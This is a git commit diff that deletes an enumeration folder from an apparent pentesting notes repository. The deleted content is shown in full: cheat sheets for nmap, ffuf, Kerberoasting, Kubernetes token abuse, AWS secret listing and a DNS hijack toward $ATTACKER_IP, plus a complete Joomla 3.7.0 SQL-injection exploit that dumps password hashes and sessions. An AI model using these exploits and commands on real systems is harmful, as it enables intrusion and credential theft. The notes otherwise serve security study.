removed enumeration dir

This commit is contained in:
Stefan Friese 2022-11-13 01:18:58 +01:00
parent 628cfd0a67
commit e1b1a5e9cd
58 changed files with 0 additions and 1887 deletions

36
.gitmodules vendored
View File

@ -1,18 +1,3 @@
[submodule "enumeration/Sublist3r"]
path = enumeration/Sublist3r
url = https://github.com/aboul3la/Sublist3r.git
[submodule "enumeration/gobuster"]
path = enumeration/gobuster
url = https://github.com/OJ/gobuster.git
[submodule "enumeration/Checklists"]
path = enumeration/Checklists
url = https://github.com/netbiosX/Checklists.git
[submodule "enumeration/kerbrute"]
path = enumeration/kerbrute
url = https://github.com/ropnop/kerbrute.git
[submodule "enumeration/windows/Windows-Exploit-Suggester"]
path = enumeration/windows/Windows-Exploit-Suggester
url = https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
[submodule "PayloadsAllTheThings"] [submodule "PayloadsAllTheThings"]
path = PayloadsAllTheThings path = PayloadsAllTheThings
url = https://github.com/swisskyrepo/PayloadsAllTheThings.git url = https://github.com/swisskyrepo/PayloadsAllTheThings.git
@ -34,12 +19,6 @@
[submodule "enumeration/enumeration"] [submodule "enumeration/enumeration"]
path = enumeration/enumeration path = enumeration/enumeration
url = https://github.com/digininja/CeWL.git url = https://github.com/digininja/CeWL.git
[submodule "enumeration/CeWL"]
path = enumeration/CeWL
url = https://github.com/digininja/CeWL.git
[submodule "enumeration/RustScan"]
path = enumeration/RustScan
url = https://github.com/RustScan/RustScan.git
[submodule "post_exploitation/priv_esc/privesc-scripts/linux-exploit-suggester"] [submodule "post_exploitation/priv_esc/privesc-scripts/linux-exploit-suggester"]
path = post_exploitation/priv_esc/privesc-scripts/linux-exploit-suggester path = post_exploitation/priv_esc/privesc-scripts/linux-exploit-suggester
url = https://github.com/mzet-/linux-exploit-suggester url = https://github.com/mzet-/linux-exploit-suggester
@ -97,12 +76,6 @@
[submodule "exploit/windows/PrintNightmare"] [submodule "exploit/windows/PrintNightmare"]
path = exploit/windows/PrintNightmare path = exploit/windows/PrintNightmare
url = https://github.com/ly4k/PrintNightmare.git url = https://github.com/ly4k/PrintNightmare.git
[submodule "enumeration/containers/deepce"]
path = enumeration/containers/deepce
url = https://github.com/stealthcopter/deepce.git
[submodule "enumeration/Typo3Scan"]
path = enumeration/Typo3Scan
url = https://github.com/whoot/Typo3Scan.git
[submodule "exploit/web/php/phpggc"] [submodule "exploit/web/php/phpggc"]
path = exploit/web/php/phpggc path = exploit/web/php/phpggc
url = https://github.com/ambionics/phpggc.git url = https://github.com/ambionics/phpggc.git
@ -127,9 +100,6 @@
[submodule "post_exploitation/powershell"] [submodule "post_exploitation/powershell"]
path = post_exploitation/powershell path = post_exploitation/powershell
url = https://github.com/puckiestyle/powershell.git url = https://github.com/puckiestyle/powershell.git
[submodule "enumeration/network_scanners/kotlin-port-scanner"]
path = enumeration/network_scanners/kotlin-port-scanner
url = https://github.com/Hydragyrum/kotlin-port-scanner.git
[submodule "exploit/macOS/ds_store_exp"] [submodule "exploit/macOS/ds_store_exp"]
path = exploit/macOS/ds_store_exp path = exploit/macOS/ds_store_exp
url = https://github.com/lijiejie/ds_store_exp.git url = https://github.com/lijiejie/ds_store_exp.git
@ -148,9 +118,6 @@
[submodule "exploit/padding/PadBuster"] [submodule "exploit/padding/PadBuster"]
path = exploit/padding/PadBuster path = exploit/padding/PadBuster
url = https://github.com/AonCyberLabs/PadBuster.git url = https://github.com/AonCyberLabs/PadBuster.git
[submodule "enumeration/Subrake"]
path = enumeration/Subrake
url = https://github.com/hash3liZer/Subrake.git
[submodule "post_exploitation/bc_security/Empire"] [submodule "post_exploitation/bc_security/Empire"]
path = post_exploitation/bc_security/Empire path = post_exploitation/bc_security/Empire
url = https://github.com/BC-SECURITY/Empire.git url = https://github.com/BC-SECURITY/Empire.git
@ -160,9 +127,6 @@
[submodule "misc/bruteforce/patator"] [submodule "misc/bruteforce/patator"]
path = misc/bruteforce/patator path = misc/bruteforce/patator
url = https://github.com/lanjelot/patator.git url = https://github.com/lanjelot/patator.git
[submodule "enumeration/enum4linux"]
path = enumeration/enum4linux
url = https://github.com/CiscoCXSecurity/enum4linux.git
[submodule "exploit/samba/smbmap"] [submodule "exploit/samba/smbmap"]
path = exploit/samba/smbmap path = exploit/samba/smbmap
url = https://github.com/ShawnDEvans/smbmap.git url = https://github.com/ShawnDEvans/smbmap.git

@ -1 +0,0 @@
Subproject commit 3c0e726604c9dc2590a699c89aabeaa0acf9f94d

@ -1 +0,0 @@
Subproject commit 5fc1c93767878028c0f8c74de37cb9dee1659f60

Binary file not shown.

@ -1 +0,0 @@
Subproject commit a444ab66e1d2ce17a3154b7cbe21a221bad97e30

@ -1 +0,0 @@
Subproject commit 729d649ec5370730172bf6f5314aafd68c874124

@ -1 +0,0 @@
Subproject commit 08b2a2509c934d5d9c6256c7dbe14ef26f6ddb6c

@ -1 +0,0 @@
Subproject commit 9ee2b90114121ecd95ffc943a81aa1d01c054a2f

@ -1 +0,0 @@
Subproject commit 060506279e6a0a5127da7245e9dac58c76d64fb4

View File

@ -1,84 +0,0 @@
# AWS S3 Enumeration
## Usage
* [Regions](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-regions-availability-zones.html#concepts-available-segions)
* `--region`
### Simple Storage Service (S3)
* [S3](https://aws.amazon.com/s3/)
* Methods of access control are as follows
* [Bucket policies](https://docs.aws.amazon.com/AmazonS3/latest/userguide/bucket-policies.html)
* [S3 ACL](https://docs.aws.amazon.com/AmazonS3/latest/userguide/managing-acls.html)
* Scheme is
```sh
http://<bucketname>.s3.amazonaws.com/file.name
```
or
```sh
http://s3.amazonaws.com/BUCKETNAME/FILENAME.ext
```
* __List content of public bucket via__
```sh
aws s3 ls s3://<bucketname>/ --no-sign-request
```
* Download via `curl`, `wget` or `s3` cli via
```sh
aws s3 cp s3://<bucketname>/foo_public.xml . --no-sign-request
```
#### ACL
* `Anyone`, just `curl`
* `AuthenticatedUsers`, `s3` cli with aws key
## IAM
* Not necessarily used by s3
* Access key ID, starts with `AKIA` + 20 chars
* Secret access key
* Session token, `ASIA` + sessionToken
* Add credentials to profile via
```sh
aws configure --profile PROFILENAME
```
* Config and credentials is stored at `~/.aws`
* Sanity test profile via
```sh
aws s3 ls --profile PROFILENAME
```
* Find account ID to an access key
```sh
aws sts get-access-key-info --access-key-id AKIAEXAMPLE
```
* Find username to an access key
```sh
aws sts get-caller-identity --profile PROFILENAME
```
* Listing EC2 instances of an account
```sh
aws ec2 describe-instances --output text --profile PROFILENAME
```
* aws ec2 describe-instances --output text --profile PROFILENAME
```sh
aws ec2 describe-instances --output text --profile PROFILENAME
```
* In another region
```sh
aws ec2 describe-instances --output text --region us-east-1 --profile PROFILENAME
```
### AWS ARN
* Unique ID is create via the following scheme
```sh
arn:aws:<service>:<region>:<account_id>:<resource_type>/<resource_name>
```
### Secrets
```sh
aws secretsmanager help
aws secretsmanager list-secrets
ws secretsmanager get-secret-value --secret-id <Name> --region <region>
```

View File

@ -1,4 +0,0 @@
# Cewl
* Wordlist generator from website
* [CeWl repo](https://github.com/digininja/CeWL.git)

View File

@ -1,25 +0,0 @@
# DNS
## Subdomain Enumeration
* Get all the info via
```sh
dig @$TARGET_DNS $DOMAIN axfr
drill @$TARGET_DNS $DOMAIN axfr
```
* [subrake](https://github.com/hash3liZer/Subrake.git)
## Join a Domain
* Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk
```sh
nsupdate
server <DNS-IP>
update delete <sub.domain.com>
update add <sub.domain.com> 1234 A $ATTACKER_IP
send
quit
```
* Check domain by querying the subdomain's A record via dig/drill/nslookup

View File

@ -1,21 +0,0 @@
# Docker Enumeration
## Save Images
* Save image and extract it
```sh
docker save -o image.tar <image-name>
tar -xf image.tar
```
* Run a container from the image and `printenv`
### Manifest
* Read the manifest inside the image extracted
```sh
jq . manifest.json
```
* Read the config JSON file mentioned in the manifest
* Inside this config file there are the shell commands used at building the image
* Snoop around after interesting files, especially inside the root dir in `layer.tar`

View File

@ -1,53 +0,0 @@
# Fuzz Faster U Fool
## Usage
```sh
ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt
```
* Fuzz dirs
```sh
ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
```
* Fuzz files
```sh
ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -e .php,.txt
```
### Fuzz parameters
```sh
ffuf -u 'http://MACHINE_IP/sqli-labs/Less-1/?FUZZ=1' -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 39
ffuf -u 'http://MACHINE_IP/sqli-labs/Less-1/?FUZZ=1' -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -fw 39
```
* Fuzz values
```sh
seq 0 255 | fuff -u 'http://<IP>/sqli-labs/Less-1/?id=FUZZ -c -w - -fw 33
```
* Fuzz Post Methods
```sh
ffuf -u http://<IP>/sqli-labs/Less-11/ -c -w /usr/share/seclists/Passwords/Leaked-Databases/hak5.txt -X POST -d 'uname=Dummy&passwd=FUZZ&submit=Submit' -fs 1435 -H 'Content-Type: application/x-www-form-urlencoded'
```
### Fuzz Users and use Bruteforce
* Fuzz users and write file
```sh
ffuf -w /usr/share/seclists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://<targetURL>/customers/signup -mr "username already exists" -o fuff.out
```
* Use users saved in `fuff.out` to bruteforce
```sh
ffuf -w userlist.txt:W1,/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://<targetURL>/customers/login -fc 200
```
### Fuzz Subdomains
```sh
ffuf -u http://FUZZ.test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
```
or if the subdomains are listed in the target's host file
```sh
ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.test.com" -u http://<target-IP> -fs 0
```
* Fuzz Vhosts & Server Blocks
```sh
ffuf -u http://FUZZ.test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 0
ffuf -u http://test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.test.com' -fs 0
```
### Proxy
* `-replay-proxy <IP>` or `-x <ProxyIP>`

View File

@ -1,48 +0,0 @@
# Gobuster
[Repo](https://github.com/OJ/gobuster.git)
### Directories
```sh
gobuster dir -u <URL> -w <wordlist>
```
### DNS
```sh
gobuster dns -d <domainName> -w <wordlist> --show-cname --show-ips --resolver <dns-Server>
```
### Vhosts
* Find other Domains on a host via `seclists/Discovery/DNS/subdomains-top1million-5000.txt`
```sh
gobuster vhost -u <URL> -w <wordlist>
```
### FileExtension
```sh
-x
```
* Fuzz for files and file extensions
```sh
gobuster dir -u <URL> -w /usr/share/seclists/Discovery/raft-small-word-lowercase.txt -x .conf,.js
```
### Basic Auth
```sh
gobuster help dir
```
* `--username` and `--password`
* `dir -s` Accept HTTP Status
* `dir -k` Skip TLS Auth
* `dir -a` User Agent
### Wordlists
```sh
/usr/share/seclists/Discovery/Web-Content/common.txt
/usr/share/seclists/Discovery/Web-Content/big.txt
/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt
```

View File

@ -1,55 +0,0 @@
# Kerberoast
## Usage
### List users
```sh
kerbrute userenum -d $DOMAIN --dc $TARGET_IP $USER_LIST
```
### Get Users
* Impacket's `GetNPUsers.py` to get Hashes of userlist
```sh
GetNPUsers.py -no-pass <DomainName>/ -usersfile users.txt -format john -outputfile hashes
```
### Find SPNs
```sh
GetUserSPNs.py -request <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP
```
or
```sh
pyverview get-netuser -u <USER> -p <PASSWORD> -t <SUBDOMAIN> -d <DOMAIN>
```
### Further Intel
```sh
findDelegation.py -debug <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP
```
### Check Found Users
* Use crackmapexec to check access to further user accounts with the password of the user found with `GetNPUsers.py`
```sh
crackmapexec smb $TARGET_IP -u users.txt -p pass.txt
```
* Watch out for `STATUS_PASSWORD_MUST_CHANGE`
* Change password with
```sh
smbpasswd.py <user>@$TARGET_IP -newpass password123
```
### Impersonate
```sh
getST.py -spn <USER>/<SUBDOMAIN> -impersonate Administrator '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip $TARGET_IP
```
* Serviceticket is save as `Administrator.ccache`
* `export KRB5CCNAME=Administrator.ccache`
* After that dump secrets
```sh
secretsdump.py -k -no-pass <DOMAIN>
```

View File

@ -1,81 +0,0 @@
# Kubectl
* Get pods, `-A` for all namespaces
```sh
kubectl get pods -A
```
* Check mounted secret
```sh
kubectl auth can-i --list
kubectl get secrets
kubectl get nodes
kubectl get deployments
kubectl get services
kubectl get ingress
kubectl get jobs
```
* Intel about a secret, and output
```sh
kubectl describe secrets <secret>
kubectl get secret <secret> -o json
kubectl describe secrets <secret> -o 'json'
```
## Abuse Token
* Inside a pod the service token(jwt) can be found under `/var/run/secrets/kubernetes.io/serviceaccount/token`
* By change of an LFI extract the token and
```sh
kubectl auth can-i --list --token=$TOKEN
kubectl get pods --token=$TOKEN
kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh
```
* __Do not copy the token around, it will end in a carfuffle of some truncated string most of the time. Just do it in the following way and spare the pain for another day__
```
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
```
### Elevate Permissions with found token
* If a token has been found but its permissions on other containers can not be used through kubectl directly, use curl
```sh
curl -k -H "Authorization: Bearer $TOKEN" --data "cmd=id" https://$K8_IP:10250/run/$NAMESPACE/$POD/$CONTAINER
```
* Find namespace and pods
```sh
kubectl get pods -A
```
* Find name of container inside the pod description under `ContainerStatuses/name`
```sh
kubectl get pod $POD -n $NAMESPACE -o yaml
```
* Interesting find in any high priv container are
```sh
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/ca.crt
```
* Enumerate again with the new found token
```sh
kubectl auth can-i --list
```
## Create Pods
* Use [BishopFox's BadPods](https://github.com/BishopFox/badPods.git)
* If there is no internet connection add `imagePullPolicy: IfNotPresent` to the YAML file
```sh
kubectl apply -f pod.yml --token=$TOKEN
```
* Start Pod
```sh
kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash
```
## Start Pods
```sh
kubectl exec -it <podname> -n <namespace> -- /bin/bash
```

View File

@ -1,23 +0,0 @@
# LDAP
## Get Domain
```sh
ldapsearch -H ldap://$TARGET_IP -x -s base namingcontexts
```
* Use found namingcontexts DC
```sh
ldapsearch -H ldap://$TARGET_IP -x -b 'DC=<DC>,DC=<ORG>
```
* Authenticated LDAP Search
```sh
ldapsearch -H ldap://$TARGET_IP -x -b 'DC=<DC>,DC=<ORG>' -D '<DC>\<user>' -W > outfile
```
## Domain Dump
* If a set of credentials are known via
```sh
ldapdomaindump $TARGET_IP -u '<domain>\<user>' -p '<password>' --no-json --no-grep
```
* Take a look at the genreated HTML files

View File

@ -1,37 +0,0 @@
# Linux Basic Enumeration
```sh
less ~/.bash_history
```
```sh
cat /etc/*-release
cat /proc/version
uname -a
```
```sh
sudo -V
sudo -L
```
* Check if is writeable
```sh
vim /etc/passwd
vim /etc/hosts
```
```sh
crontab -l
```
* Find interesting files
```sh
find / -perm /6000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -type f -name "*.log" 2>/dev/null
find / -type f -name "*.bak" 2>/dev/null
find / -type f -name "*.conf" 2>/dev/null
```
* Open Sockets
```sh
lsof -i
netstat -natup
ss -natup
```

View File

@ -1,13 +0,0 @@
# Microk8s
* [microk8s repo](https://github.com/ubuntu/microk8s)
## Enumeration
```sh
microk8s kubectl get nodes
microk8s kubectl get services
microk8s kubectl get pods
microk8s kubectl get deployments -o wide
microk8s kubectl cluster-info
```

View File

@ -1,4 +0,0 @@
# NFS Enumeration
* `rpcinfo -p $TARGET_IP`
* `showmount -e $TARGET_IP`

View File

@ -1,32 +0,0 @@
# Nikto
Scan web server vulnerabilities and more.
## mmap Input
* Pipe or pre run nmap
```sh
nmap -p80 172.16.0.0/24 -oG - | nikto -h -
```
```sh
nmap -oG -Pn -p-10000 10.10.214.141 | nikto -h 10.10.214.141 -p -
```
# Usage
* Example
```
nikto -h http://example.com i -p 80,8080
```
```sh
nikto -id <user>:<password> -h http://example.com:1234/manager/html
```
## Plugins
```sh
nikto -h http://example.com -Plugins apacheusers
```
* List all plugins
```sh
nikto -list-plugins
```

View File

@ -1,127 +0,0 @@
# nmap
## Scan Types
* ARP
* ICMP
* TCP
* UDP
## Port States
1. Open
2. Closed
3. Filtered
4. Unfiltered
5. Open|Filtered
6. Close|Filtered
## Usage
```sh
nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit <IP>
```
```sh
nmap -oA nmap-vuln -Pn -script vuln -p <Port,Port,Port,...> <IP>
```
### combo with searchsploit
* nmap-full scan
```sh
sudo nmap -oA --nmap-full -sS -sC -sV -p- --defeat-rst-ratelimit <target-IP>
searchsploit --nmap ./nmap-full.xml --verbose
```
### Wordpress Enumeration
```sh
nmap --script http-wordpress-enum --scripts-args check-latest=true,search-limit=1500 -p 80 test.com
```
### Use List of Hosts
```sh
nmap -iL <ListofHosts>
```
* Show hosts, dns resolution included
```sh
nmap -sL -n 10.10.0.0/16
```
### ARP Scan Local Network
```sh
nmap -PR -sn 192.168.0.0/24
```
### ICMP Scans
* __Type 8__ (Ping Request)
```sh
nmap -PE -sn 10.10.0.0/16
```
* __Type 13__ (Timestamp Request)
```sh
nmap -PP -sn 10.10.0.0/16
```
* __Type 17__ (Address Mask Queries)
```sh
nmap -PM -sn 10.10.0.0/16
```
### TCP Scans
* `-PS23` Syn on port 23
* `-PA80-8080` ACK on port range 80-8080
#### TCP Scan Types
* __Null Scan__ `-sN`, port is open when there is no response. Otherwise the response is `RST/ACK`
* __FIN Scan__ `-sF` , same procedure as null scan.
* __Xmas Scan__ `-sX`, `FIN/PSH/URG` is sent. `RST/ACK` when port is closed.
* __Maimon Scan__ `-sM`, sends `FIN/ACK`. Packet is dropped when port is open. Only viable on old BSD networks.
* __ACK Scan__ `-sA`, sends `ACK`. Receives `RST` regardless of the state of the port. May be used to explore firewall rules.
* __Window Scan__ `-sW`, sends `ACK`, and receives `RST` as well. Inspects the window part of the response. Used to expose firewall rules.
* __Custom Scan__ `--scanflags RSTACKFIN`, set flags randomly.
### UDP SCans
* `-PU`
* May be answered by ICMP Type 3 if the port is not reachable
### DNS Scan
* No lookup `-n`
* Reverse lookup for every host `-R`
* Host discovery only `-sn`
### Spoofing
* IP `-S <spoofed-IP>`
* MAC `--spoof-mac <spoofed-MAC>`
* Disable ping scan `-Pn`
* Decoy addresses `-D <decoy-IP>,<decoy-IP>,<decoy-IP>,RND,RND,ME`
### Service Detection
* `-sV`
* `--version-intensity <level 0-9>`
* Intensity 2 `--version-light`
* Intensity 9 `--version-all`
## Scripts
Installed at `/usr/share/nmap/scripts`
* __auth__ Authentication related scripts
* __broadcast__ Discover hosts by sending broadcast messages
* __brute__ Performs brute-force password auditing against logins
* __default__ Default scripts, same as -sC
* __discovery__ Retrieve accessible information, such as database tables and DNS names
* __dos Detects__ servers vulnerable to Denial of Service (DoS)
* __exploit__ Attempts to exploit various vulnerable services
* __external__ Checks using a third-party service, such as Geoplugin and Virustotal
* __fuzzer__ Launch fuzzing attacks
* __intrusive__ Intrusive scripts such as brute-force attacks and exploitation
* __malware__ Scans for backdoors
* __safe__ Safe scripts that wont crash the target
* __version__ Retrieve service versions
* __vuln__ Checks for vulnerabilities or exploit vulnerable services
## Tips & Tricks
* Scan the 100 most interesting ports via `-F`
* `--top-ports 100`
* One probe every 5 minutes via `-T0`
* A closed port responds with `RST/ACK` to a initial `SYN`
* Scan ports iteratively by using `-r`, not random
* Closed Port
* Control packet rate via `--min-rate` and `--max-rate`
* Control parallel probes via `--min-parallelism` and `--max-parallelism`
* Fragment packets `-f` 8 bytes, `-ff` 16 bytes or `--mtu`
* Zombie Scan `-sI <pwnd-device-IP>` via pwnd host inside the targets network
* `--reason`, `-d`, `-vv`
* `--traceroute`

View File

@ -1,13 +0,0 @@
# Port Knocking
* Open filtered port behind a firewall by knocking nicely
## Usage
* `knockd`
```sh
knock <target-IP> <magicWords>
```
or
* [arch wiki nmap script](https://wiki.archlinux.org/title/Port_knocking)
* `nc -z`

View File

@ -1,11 +0,0 @@
# rpcclient
```sh
rpcclient -U% $TARGET_IP
```
* Input commands, attributes count for the current user on the machine
```sh
enumdomusers
enumdomains
enumprivs
```

View File

@ -1,39 +0,0 @@
# rsync
* [netspi article]( https://www.netspi.com/blog/technical/network-penetration-testing/linux-hacking-case-studies-part-1-rsync/)
* [hacktricks' rsync](https://book.hacktricks.xyz/pentesting/873-pentesting-rsync)
## Enumerate
```sh
rsync <target-IP>::
rsync <target-IP>::files
rsync <target-IP>::files/foo/
```
### via netcat
* Another way is the following
```sh
nc -vn $TARGET_IP 873
```
* Repeat the identical handshake, e.g.
```
@RSYNCD: 31.0
```
* List all directories
```sh
#list
```
## Downloads
```sh
rsync <user>@<target-IP>::/files/foo/bar.txt .
rsync -r <user>@<target-IP>::/files/foo .
```
## Uploads
```sh
rsync authorized_keys <user>@<target-IP>::/files/foo/.ssh/
rsync -r documents <user>@<target-IP>::/files/foo/
```

View File

@ -1,14 +0,0 @@
# Rustscan
* [Rustscan repo](https://github.com/RustScan/RustScan)
* Config at `$HOME/.rustscan_scripts.toml`
## Usage
```sh
rustscan -r ports -a <Target-ip> -- <nmap cmds>
```
* Using nmap parameters
```sh
rustscan -a 127.0.0.1 -- -A -sC
```

View File

@ -1,31 +0,0 @@
# Shodan
## Checking found Autonomous System Number (ASN)
* Shodan does output ASN, not necessarily the IP of a small company. Search for
```h
asn:AS13335
```
* [ASN Check](https://dnschecker.org/asn-whois-lookup.php)
## Banner
* Example
```json
{
"data": "Moxa Nport Device",
"Status": "Authentication disabled",
"Name": "NP5232I_4728",
"MAC": "00:90:e8:47:10:2d",
"ip_str": "46.252.132.235",
"port": 4800,
"org": "Starhub Mobile",
"location": {
"country_code": "SG"
}
}
```
## Filter
* vulns
```sh
vuln:ms17-010
```

View File

@ -1,11 +0,0 @@
# SNMP Enumeration
* Find community strings
```sh
onesixtyone $TARGET_IP -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt
```
* Query users
```
snmpwalk -v2c -c <community_string> $TARGET_IP 1.3.6.1.4.1.77.1.2.25
```

View File

@ -1,15 +0,0 @@
# snmpcheck
* [git repo](https://gitlab.com/kalilinux/packages/snmpcheck.git)
* Ruby script, clone and
```sh
cd snmpcheck
gem install snmp
chmod 775 snmpcheck-<version>.rb
```
## Usage
```sh
./snmpcheck-<version>.rb $TARGET_IP -c <community-string>
```

View File

@ -1,12 +0,0 @@
# Website Enumeration
* `robots.txt`
* [Favicon](https://wiki.owasp.org/index.php/OWASP_favicon_database), `curl` target and `md5sum`
* `sitemap.xml`
* Headers, `curl <site>` including `-I` or `-v` parameters
* Check Components of the website, like blog frameworks, shops.
* User Wappalyzer
* Snapshots of the site via waybackmachine
* Check repos of the site
* Check buckets
* Fuzz

View File

@ -1,6 +0,0 @@
# Wfuzz
* Fuzz parameters
```sh
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/common.txt -X POST --hh 45 -u http://<target-IP>/api/items\?FUZZ\=test
```

View File

@ -1,35 +0,0 @@
# WPScan
## Themes
```sh
wpscan --url <URL> --enumerate t
```
* `ls` for content
## Plugins
```sh
wpscan --url <URL> --enumerate p
```
## Users
```sh
wpscan --url <URL> --enumerate u
```
## Vulnerabilities
* WPVulnDB API is needed
* Plugins
```sh
wpscan --url <URL> --enumerate vp
```
## Password attack
```sh
wpscan --url <URL> --passwords <wordlist> --usernames <usersFromEnumeration>
```
## WAF Aggressiveness
```sh
wpscan --url <URL> --enumerate p --plugins-detection <aggressive/passive>

@ -1 +0,0 @@
Subproject commit 072168b27fbb991c8a009663bbe54b46a8b5dc15

@ -1 +0,0 @@
Subproject commit f7bc13252b4da5d13b2e9d93295da28a1f612125

View File

@ -1,186 +0,0 @@
#!/usr/bin/python3
import requests
import sys
import re
import argparse
import os
import random
import time
import binascii
def extract_token(resp):
match = re.search(r'name="([a-f0-9]{32})" value="1"', resp.text, re.S)
if match is None:
print(" [!] Cannot find CSRF token")
return None
return match.group(1)
def parse_options():
parser = argparse.ArgumentParser(description='Jooma Exploit')
parser.add_argument('url', help='Base URL for Joomla site')
return parser.parse_args()
def build_sqli(colname, morequery):
return "(SELECT " + colname + " " + morequery + ")"
def joomla_370_sqli_extract(options, sess, token, colname, morequery):
sqli = build_sqli("LENGTH("+colname+")", morequery)
length = joomla_370_sqli(options, sess, token, sqli)
if not length:
return None
length = int(length)
maxbytes = 30
offset = 0
result = ''
while length > offset:
sqli = build_sqli("HEX(MID(%s,%d,%d))" % (colname, offset + 1, 16), morequery)
value = joomla_370_sqli(options, sess, token, sqli)
if not value:
print(" [!] Failed to retrieve string for query:", sqli)
return None
value = binascii.unhexlify(value)
result += value
offset += len(value)
return result
def joomla_370_sqli(options, sess, token, sqli):
sqli_full = "UpdateXML(2, concat(0x3a," + sqli + ", 0x3a), 1)"
data = {
'option': 'com_fields',
'view': 'fields',
'layout': 'modal',
'list[fullordering]': sqli_full,
token: '1',
}
resp = sess.get(options.url + "/index.php?option=com_fields&view=fields&layout=modal", params=data, allow_redirects=False)
match = re.search(r'XPATH syntax error:\s*&#039;([^$\n]+)\s*&#039;\s*</bl', resp.text, re.S)
if match:
match = match.group(1).strip()
if match[0] != ':' and match[-1] != ':':
return None
return match[1:-1]
def extract_joomla_tables(options, sess, token):
tables = list()
first = False
offset = 0
while True:
result = joomla_370_sqli_extract(options, sess, token, "TABLE_NAME", "FROM information_schema.tables WHERE TABLE_NAME LIKE 0x257573657273 LIMIT " + str(offset) + ",1" )
if result is None:
if first:
print("[!] Failed to retrieve first table name!")
return False
break
tables.append(result)
print(" - Found table:", result)
first = False
offset += 1
return tables
def extract_joomla_users(options, sess, token, table_name):
users = list()
offset = 0
first = False
print(" - Extracting users from", table_name)
while True:
result = joomla_370_sqli_extract(options, sess, token, "CONCAT(id,0x7c,name,0x7c,username,0x7c,email,0x7c,password,0x7c,otpKey,0x7c,otep)", "FROM %s ORDER BY registerDate ASC LIMIT %d,1" % (table_name, offset) )
if result is None:
if first:
print("[!] Failed to retrieve user from table!")
return False
break
result = result.split('|')
print(" [$] Found user",result)
first = False
offset += 1
users.append(result)
return users
def extract_joomla_sessions(options, sess, token, table_name):
sessions = list()
offset = 0
first = False
print(" - Extracting sessions from", table_name)
while True:
result = joomla_370_sqli_extract(options, sess, token, "CONCAT(userid,0x7c,session_id,0x7c,username)", "FROM %s WHERE guest = 0 LIMIT %d,1" % (table_name, offset) )
if result is None:
if first:
print("[!] Failed to retrieve session from table!")
return False
break
result = result.split('|')
print(" [$] Found session", result)
first = False
offset += 1
sessions.append(result)
return sessions
def pwn_joomla_again(options):
sess = requests.Session()
print(" [-] Fetching CSRF token")
resp = sess.get(options.url + "/index.php/component/users/?view=login")
token = extract_token(resp)
if not token:
return False
# Verify that we can perform SQLi
print(" [-] Testing SQLi")
result = joomla_370_sqli(options, sess, token, "128+127")
if result != "255":
print(" [!] Could not find SQLi output!")
return False
tables = extract_joomla_tables(options, sess, token)
for table_name in tables:
table_prefix = table_name[:-5]
extract_joomla_users(options, sess, token, table_name)
extract_joomla_sessions(options, sess, token, table_prefix + 'session')
return True
def print_logo():
clear = "\x1b[0m"
colors = [31, 32, 33, 34, 35, 36]
logo = """
.---. .-'''-. .-'''-.
| | ' _ \ ' _ \ .---.
'---' / /` '. \ / /` '. \ __ __ ___ /| | | .
.---.. | \ ' . | \ ' | |/ `.' `. || | | .'|
| || ' | '| ' | '| .-. .-. '|| | | < |
| |\ \ / / \ \ / / | | | | | ||| __ | | __ | |
| | `. ` ..' / `. ` ..' / | | | | | |||/'__ '. | | .:--.'. | | .'''-.
| | '-...-'` '-...-'` | | | | | ||:/` '. '| |/ | \ | | |/.'''. \
| | | | | | | ||| | || |`" __ | | | / | |
| | |__| |__| |__|||\ / '| | .'.''| | | | | |
__.' ' |/\'..' / '---'/ / | |_| | | |
| ' ' `'-'` \ \._,\ '/| '. | '.
|____.' `--' `" '---' '---'
"""
for line in logo.split("\n"):
sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
#time.sleep(0.05)
def main(base_url):
options = parse_options()
options.url = options.url.rstrip('/')
print_logo()
pwn_joomla_again(options)
if __name__ == "__main__":
sys.exit(main("http://192.168.10.100:8080/joomla"))

@ -1 +0,0 @@
Subproject commit 9cfb81e4fab8037acb44c678773ca3f93bc2b39c

View File

@ -1,11 +0,0 @@
#!/usr/bin/python3
import socket
host = "1.1.1.1"
portList = [21,22,53,80,443,3306,8443,8080]
for port in portList:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,port))
print("Port ", port, " is open")
except:
print("Port ", port, " is closed")

View File

@ -1,16 +0,0 @@
#!/usr/bin/env python
from scapy.all import *
interface = "wls3"
ip_range = "192.168.179.0/24"
broadcastMac = "ff:ff:ff:ff:ff:ff"
packet = Ether(dst=broadcastMac)/ARP(pdst=ip_range)
ans, unans = srp(packet, timeout=2, iface=interface, inter=0.1)
